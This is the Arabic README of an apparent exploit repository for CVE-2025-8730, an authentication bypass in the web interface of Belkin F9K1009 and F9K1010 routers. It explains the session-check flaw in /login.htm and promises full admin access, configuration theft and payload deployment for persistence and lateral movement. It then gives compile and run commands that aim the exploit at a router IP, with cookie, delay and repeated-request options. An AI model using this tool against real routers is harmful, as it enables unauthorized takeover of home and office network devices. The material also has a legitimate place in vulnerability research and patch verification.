
استغلال يوضح ثغرة تجاوز المصادقة في واجهة الويب لموجهات Belkin F9K1009 و F9K1010.
المؤلف : Byte Reaper
يحتوي هذا المستودع على استغلال لـ CVE‑2025‑8730، وهي ثغرة حرجة لتجاوز المصادقة تؤثر على الواجهة الويب لأجهزة التوجيه Belkin F9K1009 وF9K1010.
يكمن الخلل في منطق التحقق من الجلسة في ملف /login.htm، حيث تسمح ملفات تعريف الارتباط التي تم التعامل معها بشكل غير صحيح أو الطلبات المصممة للمهاجمين بتجاوز فحوصات تسجيل الدخول والحصول على وصول كامل إلى الواجهة الإدارية بدون بيانات اعتماد صالحة.
تمكّن هذه الثغرة المهاجمين عن بعد (مع وصول إلى الشبكة) من:
الوصول إلى بيانات التكوين الحساسة
تعديل إعدادات جهاز التوجيه
نشر حمولات إضافية للاستمرارية أو الحركة الجانبية
إدخال NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-8730
gcc exploit.c argparse.c -o CVE-2025-8730 -lcurl
./CVE-2025-8730 -i 192.168.1.1
Verbose Mode :
./CVE-2025-8730 -i 192.168.1.1 -v -c [cookie file]
Full URl :
./CVE-2025-8730 -f http://<IP>/<LOGIN_FILE>
Sleep (second):
./CVE-2025-8730 -i 192.168.1.1 -s 1
Number Request (For loop), example 10 Request POST :
./CVE-2025-8730 -i 192.168.1.1 -k 10 -s 1 -v
الترخيص :
MIT License